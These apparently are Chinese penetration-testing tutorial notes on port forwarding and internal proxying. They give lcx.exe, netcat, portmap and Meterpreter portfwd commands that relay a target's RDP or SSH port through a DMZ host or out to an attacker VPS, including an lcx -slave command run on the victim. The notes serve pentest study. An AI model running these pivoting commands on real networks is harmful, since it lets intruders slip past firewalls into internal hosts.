端口转发

1.目标机器有公网ip，但是端口被防火墙限制
博客：https://www.zhuguodong.com/?id=486
lcx.exe与portmap工具：https://github.com/Brucetg/Pentest-tools
端口转发

winserver上执行（记得入站规则和开启rdp）

lcx.exe -tran 4444 127.0.0.1 3389

kali

rdesktop 172.31.171.152:4444

2..目标机器有公网ip，将内网其他主机端口映射到跳板机某个端口
LCX利用：

ubuntu: （内网）
nc -lvnp 22

将内网某主机22端口（此处为ubuntu）映射到本机4444

win server （DMZ）
lcx.exe -tran 4444 10.10.10.15 22

kali （公网）
nc 172.31.171.152 4444

MSFShell利用：

portfwd add -l 6666 -r 目标ip -p 目标端口
portfwd delete -l 6666 -r 192.168.159.154 -p 80
portfwd list   列出所有端口转发
add会将端口转发添加到列表中，并将为我们创建一个隧道。请注意，此通道也将存在于Metasploit控制台之外，使其可用于任何终端会话。

3.目标无公网IP，将内网某主机端口映射到VPS某个端口

在受害机上执行：

lcx.exe -slave 192.168.1.4(攻击机IP) 4444 127.0.0.1 3389
这条命令的意思就是将本机的 3389 端口转发到攻击机的 4444 端口上

之后在攻击机上执行（公网kali vps）：

./portmap -m 2 -p1 4444 -h2 192.168.1.4 -p2 5555
这条命令的意思就是将本地4444端口接收的数据转发到5555端口

rdesktop 192.168.1.4:5555

内网代理

FRP使用：
多级代理：

https://www.viewofthai.link/2022/11/15/%e7%ab%af%e5%8f%a3%e8%bd%ac%e5%8f%91%e4%b8%8e%e5%86%85%e7%bd%91%e4%bb%a3%e7%90%86/

端口复用

https://blog.csdn.net/yang1234567898/article/details/125173701

he11的农场

内网渗透体系建设--第3章--端口转发与内网代理

端口转发

内网代理

端口复用

内网渗透体系建设--第2章--内网资源探测--获取常见应用软件凭据